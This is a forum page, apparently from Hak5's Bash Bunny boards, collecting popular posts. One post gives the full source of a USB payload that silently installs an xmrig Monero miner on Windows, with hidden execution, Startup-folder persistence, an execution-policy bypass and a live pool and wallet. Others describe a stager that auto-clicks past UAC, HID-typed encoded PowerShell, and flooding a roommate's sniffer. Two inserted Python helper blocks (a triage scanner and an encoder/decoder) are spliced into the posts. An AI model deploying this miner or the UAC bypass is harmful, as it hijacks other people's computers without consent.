

Popular Content

Showing content with the highest reputation since 02/11/2019 in all areas

  1. 2 points
    Sometimes it's easier to register an account on a hacking forum and post your request to a group of strangers with the hope that one of them has access to cellular network equipment. I would have done the same 😉
  2. 1 point
    My first payload for the BB ? I just wanted to start off by saying that I don’t have a background in IT, I’m just an enthusiast. I did this really just to get more familiar with scripting and security, so I welcome any comments/criticisms. I should note that Ar1k88 posted mining payloads some time ago so creds to him for the original idea. I ended up writing my own scripts rather than editing his and made some improvements e.g. combining the CPU and GPU miners into one payload, adding persistence, silent mode, etc. Some notes below if you care:
    Silent Mode
    You can set the miners to run in the background by editing the startup.vbs script and changing “1” to “0” on lines 3 & 4, or by changing the .json config file line 11 from “false” to “true”. The CPU usage is also editable in the config file so you can set it to a lower value and avoid visibly slowing down the host’s performance (at the expense of the hash rate). Once you execute the GPU miner, the computer will become almost non-responsive so definitely noticeable.
    Persistence
    I liked the idea of a VB script that runs on every startup which then subsequently initiates the miners. Windows of course didn’t like the idea of running scripts (I don’t know if this is a default security setting) but adding the vbs file as an exception to the execution policy seems to have fixed that (reference line 16 of run.ps1).
    Instructions
    You will need to download the xmrig binaries (or compile from source). Your browser and/or AV will most likely try to block the downloads. Windows Defender doesn't seem to mind though.
    https://github.com/xmrig/xmrig/releases
    https://github.com/xmrig/xmrig-nvidia (sorry I forgot to add AMD support but it’s getting late and I have work tomorrow)
    Copy the downloaded exe files (xmrig.exe and xmrig-nvidia.exe) and the following files into the switch 2 folder in BB:

    payload.txt

    # Title: Silent Monero Miner (with persistence)
    # Description: Monero CPU miner (https://github.com/xmrig), copies the miner and config files to local disk, and adds a script to startup
    # Author: icarus255
    # Props: 0dyss3us (KeenanV) - I like his idea of adding the VB script to startup
    # Version: 1.0
    # Category: Mining
    # Target: Windows 10
    # Attackmodes: HID, Storage
    # Comments: You will need to download the binaries from (https://github.com/xmrig/) or compile from source
    # Silent mode: You can start in silent mode (background) by changing config.json line 16: "background": false, -> "background": true,

    #Setup
    LED SETUP
    ATTACKMODE HID STORAGE
    GET SWITCH_POSITION

    #Wait for drive recognition
    Q delay 4500

    #Run the Powershell script starts the miners, copies the files to local disk, and adds to startup.
    LED ATTACK
    RUN WIN Powershell -nop -ex Bypass -w Hidden ".((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\\$SWITCH_POSITION\run.ps1')"
    LED FINISH

    run.ps1

    $Drive = (Get-WMIObject Win32_Volume | ? { $_.Label -eq 'BashBunny' }).name
    $user= $env:UserName
    $cpuminer = $Drive + "payloads\switch2\xmrig.exe"
    $configfile = $Drive + "payloads\switch2\config.json"
    $startupscript = $Drive + "payloads\switch2\startup.vbs"
    $nvidiaminer = $Drive + "payloads\switch2\xmrig-nvidia.exe"
    $StartupFolder = ("C:\Users\" + $user + "\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup")
    $LocalFolder = ("C:\MoneroTest")
    Set-Location -Path $Drive + "payloads\switch2"
    copy-item -Path $cpuminer -Destination (new-item -type directory $LocalFolder) -force -ea 0
    copy-item $configfile -Destination $LocalFolder
    copy-item $nvidiaminer -Deistnation $LocalFolder
    copy-item $startupscript -Destination $StartupFolder
    Unblock-File -Path $StartupFolder + "startup.vbs"
    Set-Location -Path $StartupFolder
    Start-Process cmd -ArgumentList "/c start startup.vbs"

    config.json

    {
      "algo": "cryptonight",
      "api": {
        "port": 0,
        "access-token": null,
        "worker-id": null,
        "ipv6": false,
        "restricted": true
      },
      "av": 0,
      "background": false,
      "colors": true,
      "cpu-affinity": null,
      "cpu-priority": null,
      "donate-level": 5,
      "huge-pages": true,
      "hw-aes": null,
      "log-file": null,
      "max-cpu-usage": 75,
      "pools": [
        {
          "url": "pool.minexmr.com:4444",
          "user": "424MefYkUWB16pj42Fcsu1DVeGyywsoeY96oQkLcokoKSU2WyywLNdRXj2ms7y2JQk7c4QpTtsxZsdspHbWiwzc91rbBCjL",
          "pass": "x",
          "rig-id": null,
          "nicehash": false,
          "keepalive": false,
          "variant": 1
        }
      ],
      "print-time": 60,
      "retries": 5,
      "retry-pause": 5,
      "safe": false,
      "threads": null,
      "user-agent": null,
      "watch": false
    }

    startup.vbs

    Dim WshShell
    Set WshShell = WScript.CreateObject("WScript.shell")
    WshShell.Run "powershell.exe C:\MoneroTest\xmrig.exe", 1, False
    WshShell.Run "powershell.exe C:\MoneroTest\xmrig-nvidia.exe", 1, False
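A defender-side triage check for the persistence pattern this post relies on: a script dropped in the per-user Startup folder that launches powershell.exe with a miner binary, alongside an xmrig-style config.json. This is an added example, not code from the post or from the xmrig project. It builds a constructed sample tree in a temporary directory (placeholder pool and wallet values, not the post's) and scans that; point scan_startup_folder and summarize_miner_config at a collected Startup folder and config file to run it against real artefacts.

```python
"""Triage helper for Startup-folder script persistence and miner configs.
Added example, not the post's code. The sample tree below is constructed."""
from __future__ import annotations
import json
import re
import tempfile
from pathlib import Path

# Script types Explorer will execute from the Startup folder, and the launch
# pattern the posted startup.vbs uses (an interpreter invoked by WScript.Shell).
SCRIPT_SUFFIXES = {".vbs", ".vbe", ".js", ".jse", ".wsf", ".ps1", ".bat", ".cmd"}
LAUNCH_RE = re.compile(r"(powershell(\.exe)?|cmd(\.exe)?|wscript|cscript)", re.I)
MINER_RE = re.compile(r"(xmrig|minerd|cpuminer|cryptonight|stratum\+tcp)", re.I)


def scan_startup_folder(folder: Path) -> list[dict]:
    """One finding per script file in the folder: does it spawn an interpreter,
    and does it mention a known miner name? Non-script files are skipped."""
    findings = []
    for entry in sorted(folder.iterdir()):
        if entry.suffix.lower() not in SCRIPT_SUFFIXES:
            continue
        text = entry.read_text(errors="replace")
        findings.append({
            "file": entry.name,
            "launches_interpreter": bool(LAUNCH_RE.search(text)),
            "miner_reference": bool(MINER_RE.search(text)),
        })
    return findings


def summarize_miner_config(path: Path) -> dict:
    """Pull the fields an analyst wants from an xmrig-style config.json:
    pool endpoints to block, whether it hides in the background, and its CPU cap."""
    cfg = json.loads(path.read_text())
    return {
        "pools": [p.get("url") for p in cfg.get("pools", [])],
        "background": bool(cfg.get("background", False)),
        "max_cpu_usage": cfg.get("max-cpu-usage"),
    }


def build_sample_tree(root: Path) -> tuple[Path, Path]:
    """Constructed sample mirroring the shape of the posted startup.vbs and
    config.json, with a placeholder pool and wallet (assumed values)."""
    startup = root / "Startup"
    startup.mkdir()
    (startup / "startup.vbs").write_text(
        'Dim WshShell\n'
        'Set WshShell = WScript.CreateObject("WScript.shell")\n'
        'WshShell.Run "powershell.exe C:\\MoneroTest\\xmrig.exe", 1, False\n'
    )
    (startup / "desktop.ini").write_text("[.ShellClassInfo]\n")  # benign, must be skipped
    local = root / "MoneroTest"
    local.mkdir()
    config = local / "config.json"
    config.write_text(json.dumps({
        "background": True,
        "max-cpu-usage": 75,
        "pools": [{"url": "pool.example.invalid:4444",
                   "user": "WALLET_PLACEHOLDER", "pass": "x"}],
    }))
    return startup, config


def run_demo() -> tuple[list[dict], dict]:
    """Build the constructed tree, scan it, and return both results."""
    with tempfile.TemporaryDirectory() as tmp:
        startup, config = build_sample_tree(Path(tmp))
        return scan_startup_folder(startup), summarize_miner_config(config)


if __name__ == "__main__":
    findings, summary = run_demo()
    for finding in findings:
        print(finding)
    print(summary)
```

A script in Startup that spawns an interpreter is worth a look on its own; one that also names a miner, paired with a config whose "background" is true and whose pool host is reachable from the host, is the combination this post's payload produces.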
  3. 1 point
    Since it has been so quiet in the BashBunny forums...... So, adding on to the BBTPS is becoming challenging where I began multiple rewrites to make it modular and due to pressure from my local hackerspace (mainly the python group as something to talk about when done) the server that used to be nodejs will be done in python2. Due to the massive rewrite and additional features, though it will look oddly the same, the BBTPS new version will be called the BBMPS (BashBunny Multi Payload Stager). Its category is still the same. It is a tool, not a payload. Listening to criticism about the BBTPS, mainly it being hard to understand and so many config files, I broke it down to fewer. Hey, when you make something that can serve up multiple scripts and stuff you cannot have 1 config file. So, most of the work will be in payload.txt. You still will need to implement a json job file in the folder with your scripts except there will be 1 extra option in the json file. You will have the ability to specify if a job needs admin to run or not. This is identified in the job json file. If the agent (which is still powershell for windows) is elevated then it will run that script, else it will skip it. This leads to autoadmin. Yelp. This will add multiple stages though. Instead of you specifying in the BBMPS whether you want admin or not, it will check in the first stage it downloads if you can have it. If the account it is run under is admin and has not been elevated then through a process it will launch a new stager to grab the agent as elevated and signal the bunny to hit alt-y to get past the prompt with no exploit being run to trigger anything suspicious. If you cannot get admin then it will launch the agent in userland and run only payloads that do not require admin. This leads into the Powershell agent. Because it has been long enough, the agent will no longer work on machines with Powershell version less than 4. The BBTPS will be archived as the Powershell 2.0 version.
    The agent will be faster as I finally figured out how to get jobs to kill themselves when done, so no more constantly checking for stuck and finished jobs in a cycle except to see if it is time to download more or kill the bunny because all jobs are gone and nothing is on the BB server. The agent will also automatically run a job to gather machine info though I am still working on how much I can get between running in userland and running as elevated admin. Since I will be doing this in python, I will be able to integrate impacket's smbserver directly into the web api that the agents will be using. The smbserver will be part of the web api, so logging and stuff can be controlled more granularly. The impacket tool will still be a requirement. I have given up on autodetecting OS in a fast way. There are ways but this tool is meant to spin off a bunch of payloads as fast as possible, so to offset this I am still working through implementing hoppeye8x, so if you enable it you will have choices for on the fly moments, but the first iteration will not have multi-OS nor 8x as I am still working through how to handle auto-admin for linux and Mac. Last, since I made the no-express branch the default branch for the BBTPS repo (that is the newest version that I rebuilt that does not require any node dependencies) BBMPS may take a bit to release. Like with the node api server in the BBTPS, I am trying to keep with the core packages already on the bunny for building the python web api. That means no flask or other packages that make building those apis easier with less code. More code means more time and I have a busy couple of months so let's see how long it takes me.
  4. 1 point
    Using a webcrawler, lay down a smokescreen. Send so much random traffic to his sniffer that it fills his hard drive. That's just for starters, lol. https://github.com/slacker69/QtSmokescreen
  5. 1 point
    @UnLo@Forkish RE: 400GB microSD card UPDATE ... So, I recently bought a raspberry pi 3 along with a 400GB SanDisk microSDXC card via their online store and after formatting it to FAT32 with the built-in 'Disk' Utility manager on my Linux OS (since Windows cannot format exFAT over 32GB...), I plugged it into my nano and it reads 366.7GB/393.7GB* --- SUCCESS! 🙂 I didn't try adding any modules but since my nano reads the 400GB microSDXC, I'll assume that it will add modules and all other data just like having a 16GB microSD card, except with larger space.
  6. 1 point
  7. 1 point
    Go to google playstore and search "Learn to code". Coding is the basics of "hacking": being able to change a codescript to your usage. Lots of good apps to learn from. I use them all the time to waste time and learn something.. Personal faves. Sololearn: every code language you can think of, it's so good!! Grasshopper: it's very simple but gets to the point.
  8. 1 point
    Oneliners got you down? Trying to type out all that text, including escapes, getting confusing, and then modifying it later on is even more frustrating? Well, let's try having our one liner be a multiliner in the beginning and encode it, all from bash. Complete with all the bash variables you want to pass and powershell variables you want to be unharmed. The original premise is from @elkentaro's post about PowerRun he wrote using iconv. This can convert files to whatever encoding you want. Well, we are not converting files here, we will be converting echoed text...or an echoed variable. Let's do the example as a payload since most of you may not run linux or if you do, do not run Powershell 6 on it to test seamlessly. This is a hacky way of doing it but it works.

    LED SETUP
    MYTEXT="Charles"
    MYSCRIPT="
    \$name = \"$MYTEXT\";
    cls;
    Start-Sleep -s 2;
    Write-Host \"Hello there, \$(\$name).\";
    "
    ENCODED=$(echo $MYSCRIPT | iconv -t utf-16le | base64 -w 0)
    ATTACKMODE HID
    Q DELAY 5000
    LED ATTACK
    Q GUI r
    Q STRING "cmd"
    Q DELAY 500
    Q ENTER
    Q DELAY 2000
    Q STRING "powershell -E \"$ENCODED\""
    Q DELAY 700
    Q ENTER
    LED FINISH

    So, you still have to escape (") when inside quotes or use single quotes instead, but isn't that much easier to follow? You also still need to escape ($) where you want them passed to powershell rather than bash replacing them with its own value. Also, since bash concatenates each line, you will have to add a semicolon to each line except where a loop starts and begins, or a statement like below.

    MYTEXT="
    while \$true {
    Start-Sleep -s 1;
    Write-Host \"Running loop\";
    }
    "
    #or
    MYTEXT="
    if(\$i -eq 4) {
    Write-Host \"Item is 4.\";
    }
    "

    Now, if you do not need to pass any values from bash then you can have all your Powershell in a file all neat and formatted without all the escapes and stuff and then use the PowerRun method to encode. This is a lost gem I decided to resurrect and show a spin on.
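The iconv/base64 step from this post, rebuilt in Python as an added example (not the post's code or PowerRun): encode_command() produces what `echo $MYSCRIPT | iconv -t utf-16le | base64 -w 0` produces, including the whitespace collapse an unquoted echo causes (which is why every statement needs its own semicolon), and decode_command() reverses it, which is the step you want when a `powershell -E <blob>` turns up in process-creation logs. The script text is a constructed sample with the bash-side value already substituted.

```python
"""Encode a multi-line PowerShell script to the -EncodedCommand form, and decode one back.
Added example, not the post's code. SCRIPT below is a constructed sample."""
import base64


def join_lines(script: str) -> str:
    """Mimic an unquoted `echo $MYSCRIPT` in bash: every run of whitespace,
    newlines included, collapses to a single space."""
    return " ".join(script.split())


def encode_command(script: str, collapse: bool = True) -> str:
    """UTF-16LE then base64, exactly what `iconv -t utf-16le | base64 -w 0` emits.
    collapse=False keeps the original line breaks (the PowerRun file-based route)."""
    text = join_lines(script) if collapse else script
    return base64.b64encode(text.encode("utf-16-le")).decode("ascii")


def decode_command(blob: str) -> str:
    """Reverse step for analysts: base64 -> UTF-16LE bytes -> text.
    Missing padding (common in copied log fields) is restored first."""
    padded = blob + "=" * (-len(blob) % 4)
    return base64.b64decode(padded).decode("utf-16-le")


# Constructed sample mirroring the post's script, with MYTEXT already substituted.
NAME = "Charles"
SCRIPT = f'''
$name = "{NAME}";
cls;
Start-Sleep -s 2;
Write-Host "Hello there, $($name).";
'''


def demo() -> tuple[str, str]:
    """Encode the sample and decode it again; returns (blob, recovered_text)."""
    blob = encode_command(SCRIPT)
    return blob, decode_command(blob)


if __name__ == "__main__":
    blob, recovered = demo()
    print(f"powershell -E {blob}")
    print(recovered)
```

The recovered text is the one-line, semicolon-joined form, which is what actually reaches PowerShell; if a statement in the original lacked its semicolon, the decoded line shows the two statements run together, which is the quickest way to spot why an encoded payload fails.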
  9. 1 point
    It can. By using 3rd party tools from github + a little tweaking.
  10. 1 point
    Move out and get a different flat with better room mates.
  11. 1 point
    Don't use the Wi-Fi and stop paying for it. Or get another wireless interface (e.g. USB Wi-Fi dongle) for your Windows PC. Use that to create your own Wi-Fi AP on your Windows PC. Connect all devices to your new windows AP. Configure the Windows PC to route all your AP traffic through your VPN. Delete his AP from your known networks on all devices other than the windows PC. I don't condone revenge... it usually ends in trouble that isn't worth the short term satisfaction. But you do currently have the upper hand for mischief. Currently he does not know you know he's watching... Get creative.
  12. 1 point
    That may well be true but in your question the term "hacking" is possibly just a little bit too broad. To look at it another way it's kinda like someone saying "I barely know anything about electronics, should I buy an oscilloscope?". If they have decided that the aspect of electronics they are really interested in will need them to have one, get one. If they don't know yet, no. Similarly with "hacking" or pen-testing. If you have already decided that the aspect of pen-testing you are already interested in is what the bash bunny is good for, get one. Hak5 itself doesn't seem to be putting out any content now, so have a view of the older Hak5 vids where they actually talk about pen-testing topics. Maybe have a rummage through Null Byte's vids as well. See if there is a particular aspect that particularly interests you. Then watch vids and read up on it a bit, download a few tools, destroy a VM or three, maybe tinker with a bit of wifi sniffing and get the feel of it. Experiment and be realistic. You are unlikely to be able to instantly (or ever) get to grips with methods of privilege escalation or exploiting current vulnerabilities and, like me, you may never want or need to. Use your own dedicated kit (such as Raspberry Pis and / or VMs) when experimenting. This means you can control all aspects of the scenario you have set up. Also you won't get into trouble and this is important as even if you didn't intend to you could fall foul of the law just by not knowing what you are doing. Things like an unintentionally "uncontrolled" payload can cause havoc. Additionally you won't get frustrated when current security tools on your day to day kit throw up warnings about a bash bunny payload, the presence of a LAN Turtle or light up like a christmas tree when you switch on the "man in the middle" mode on a pineapple, because you can disable any security or not even install it without it affecting your primary system(s). All those "frustrations" have happened to me.
    I am not trying to put you off or put you down, far from it. I did exactly what you are thinking of doing. I bought some Hak5 kit, plugged it in, got it working and thought "now what?" Sure I had some success but what did all this actually mean? I did not know enough to understand or make use of it. So I put it away, decided to concentrate on basic wifi as a start, got one of my Raspberry Pis, an old Alfa USB wifi device, a spare access point to be my victim, and proceeded to try to install and use Aircrack. As I went along I became more familiar with the terminology and the techniques behind what the Pineapple does and moved on from there onto other aspects. Finally, if you are anything like me and just like gadgets, you'll probably get one anyway regardless of what anyone says 🙂
  13. 1 point
    See some people getting stuck with updating bunnies and tools etc. so put together a quick list of what I did from a brand new bash bunny on my linux box. I'm sure there are some differences with OSX and windows but in general with adaptation or tweaks this should work for all as a general outline.
    1. Read the wiki - seriously even if you don't remember it all, know where it is and use it for reference.
    2. Switch position to 3 (closest to USB) and insert to pc. With mine I got a blue light. I also backed up the original payloads dir but it's not required.
    3. Clone the payloads github locally or download the zip and extract the contents.
    4. Copy the payload folder you just cloned or extracted to the bash bunny storage and overwrite all. You now have latest payloads. At this point if you were to unplug the bunny, select switch 1 or 2 and then reinsert you would see a purple light rather than the blue one that came from factory (at least mine did).
    5. Some payloads require dependencies such as quick creds. You install the dependencies using the tools_installer payload, so it's worth running this payload as your first payload. On the Bashbunny storage delete the payload in switch 1 or 2 and then CUT the contents of /payloads/library/tools_installer/ to the switch folder of choice. DON'T copy it as there is a slight bug if you have 2x copies of this payload on the bashbunny storage when it's run. Unplug the bunny and select the switch to match where you placed the payload and reinsert the bunny. If all goes well you should eventually see a white LED. If you see a red LED you may need to check the forums.
    From this point you're ready to try other payloads or start developing new ones. Talking of which I almost forgot DuckToolkit adds support for new languages and uses the Ducktoolkit python library for encoding.
    I had some issues getting the bunny online with ICS on linux but it was mostly down to me not reading things in the bb.sh ICS script, but I will point them out in case others do the same.
    1. A factory fresh bashbunny can only ICS when the switch is in position 1 or 2, not in arming mode position 3. There is no Ethernet device on a factory fresh bunny in arming mode.
    2. When you download and run the bb.sh it should be first run without the bashbunny inserted and when the script gets to stage 3 you insert the bashbunny to complete the guided config.
    3. Just because you configured the bb.sh does not mean you're online, you still need to hit C to connect with the current configuration and start ICS.
    So from here you should have a Bashbunny with up to date payloads, dependencies installed and are able to ICS to get it online if required. Hope this helps some people.